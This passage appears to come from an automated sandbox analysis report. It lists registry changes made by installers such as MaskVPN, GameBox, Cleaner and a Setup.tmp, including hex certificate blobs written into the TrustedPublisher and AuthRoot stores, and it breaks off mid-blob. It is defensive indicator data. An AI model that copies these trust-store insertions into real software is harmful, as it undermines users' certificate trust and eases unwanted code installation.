| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{6E2A7D35-1FB7-4695-A2E1-1368CE87D5C5} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{97B75E1F-51BA-4FB1-BA06-E79414CE660F} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc